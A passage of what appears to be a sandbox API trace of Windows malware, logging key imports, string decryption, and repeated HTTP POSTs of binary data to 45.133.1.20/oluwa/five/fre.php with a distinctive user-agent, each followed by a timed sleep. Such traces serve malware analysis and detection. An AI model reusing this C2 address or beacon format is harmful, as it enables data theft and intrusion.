phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.327] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.329] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.329] GetProcessHeap () returned 0x6a0000 [0179.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0179.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.331] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0179.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.332] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.336] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0179.336] GetProcessHeap () returned 0x6a0000 [0179.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.338] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0179.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.339] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0179.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.340] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0179.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.341] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0179.341] GetProcessHeap () returned 0x6a0000 [0179.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.341] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ba040*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0179.341] GetProcessHeap () returned 0x6a0000 [0179.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0179.342] socket (af=2, type=1, protocol=6) returned 0x3cc [0179.342] connect (s=0x3cc, name=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0179.369] FreeAddrInfoW (pAddrInfo=0x6ba040*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0179.369] GetProcessHeap () returned 0x6a0000 [0179.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0179.369] GetProcessHeap () returned 0x6a0000 [0179.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0179.370] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.371] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.371] GetProcessHeap () returned 0x6a0000 [0179.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0179.371] GetProcessHeap () returned 0x6a0000 [0179.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.372] GetProcessHeap () returned 0x6a0000 [0179.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0179.372] GetProcessHeap () returned 0x6a0000 [0179.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0179.373] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.374] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.374] GetProcessHeap () returned 0x6a0000 [0179.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0179.374] GetProcessHeap () returned 0x6a0000 [0179.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.375] send (s=0x3cc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0179.375] send (s=0x3cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0179.375] GetProcessHeap () returned 0x6a0000 [0179.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0179.375] recv (in: s=0x3cc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0179.451] GetProcessHeap () returned 0x6a0000 [0179.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0179.451] GetProcessHeap () returned 0x6a0000 [0179.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0179.453] GetProcessHeap () returned 0x6a0000 [0179.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0179.453] GetProcessHeap () returned 0x6a0000 [0179.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0179.453] closesocket (s=0x3cc) returned 0 [0179.455] GetProcessHeap () returned 0x6a0000 [0179.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0179.455] GetProcessHeap () returned 0x6a0000 [0179.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.456] GetProcessHeap () returned 0x6a0000 [0179.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.458] GetProcessHeap () returned 0x6a0000 [0179.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0179.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa14) returned 0x3cc [0179.460] Sleep (dwMilliseconds=0xea60) [0179.462] GetProcessHeap () returned 0x6a0000 [0179.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0179.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0179.486] GetProcessHeap () returned 0x6a0000 [0179.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0179.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.489] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.490] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.491] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.491] GetProcessHeap () returned 0x6a0000 [0179.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0179.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.493] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0179.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.494] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.495] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0179.504] GetProcessHeap () returned 0x6a0000 [0179.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.505] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.506] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.507] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.508] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.508] GetProcessHeap () returned 0x6a0000 [0179.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.508] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.508] GetProcessHeap () returned 0x6a0000 [0179.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0179.509] GetProcessHeap () returned 0x6a0000 [0179.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.509] GetProcessHeap () returned 0x6a0000 [0179.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.510] GetProcessHeap () returned 0x6a0000 [0179.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0179.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.513] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.525] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0179.533] GetProcessHeap () returned 0x6a0000 [0179.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0179.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.535] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.536] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.536] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.537] GetProcessHeap () returned 0x6a0000 [0179.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0179.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.538] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0179.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.539] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.540] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0179.540] GetProcessHeap () returned 0x6a0000 [0179.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.541] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0179.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.542] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0179.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.543] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0179.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.546] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0179.546] GetProcessHeap () returned 0x6a0000 [0179.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.546] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9eb0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0179.546] GetProcessHeap () returned 0x6a0000 [0179.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0179.546] socket (af=2, type=1, protocol=6) returned 0x3d0 [0179.547] connect (s=0x3d0, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0179.573] FreeAddrInfoW (pAddrInfo=0x6b9eb0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0179.573] GetProcessHeap () returned 0x6a0000 [0179.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0179.573] GetProcessHeap () returned 0x6a0000 [0179.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0179.574] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.581] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.581] GetProcessHeap () returned 0x6a0000 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0179.581] GetProcessHeap () returned 0x6a0000 [0179.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.581] GetProcessHeap () returned 0x6a0000 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0179.581] GetProcessHeap () returned 0x6a0000 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0179.582] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.583] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.583] GetProcessHeap () returned 0x6a0000 [0179.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0179.583] GetProcessHeap () returned 0x6a0000 [0179.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.584] send (s=0x3d0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0179.584] send (s=0x3d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0179.585] GetProcessHeap () returned 0x6a0000 [0179.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0179.585] recv (in: s=0x3d0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0179.672] GetProcessHeap () returned 0x6a0000 [0179.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0179.673] GetProcessHeap () returned 0x6a0000 [0179.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.673] GetProcessHeap () returned 0x6a0000 [0179.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0179.673] GetProcessHeap () returned 0x6a0000 [0179.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0179.674] closesocket (s=0x3d0) returned 0 [0179.674] GetProcessHeap () returned 0x6a0000 [0179.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0179.675] GetProcessHeap () returned 0x6a0000 [0179.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.676] GetProcessHeap () returned 0x6a0000 [0179.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0179.677] GetProcessHeap () returned 0x6a0000 [0179.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0179.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x101c) returned 0x3d0 [0179.680] Sleep (dwMilliseconds=0xea60) [0179.681] GetProcessHeap () returned 0x6a0000 [0179.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0179.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0179.706] GetProcessHeap () returned 0x6a0000 [0179.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf700 [0179.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.710] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6bf700, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.711] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.712] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.712] GetProcessHeap () returned 0x6a0000 [0179.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf700 | out: hHeap=0x6a0000) returned 1 [0179.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.714] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0179.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.715] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.716] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0179.716] GetProcessHeap () returned 0x6a0000 [0179.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.717] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.718] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.719] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.720] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.720] GetProcessHeap () returned 0x6a0000 [0179.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.720] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.720] GetProcessHeap () returned 0x6a0000 [0179.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0179.721] GetProcessHeap () returned 0x6a0000 [0179.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.721] GetProcessHeap () returned 0x6a0000 [0179.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.722] GetProcessHeap () returned 0x6a0000 [0179.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0179.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0179.740] GetProcessHeap () returned 0x6a0000 [0179.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0179.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.741] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0179.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.742] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.744] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.744] GetProcessHeap () returned 0x6a0000 [0179.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0179.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.746] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: 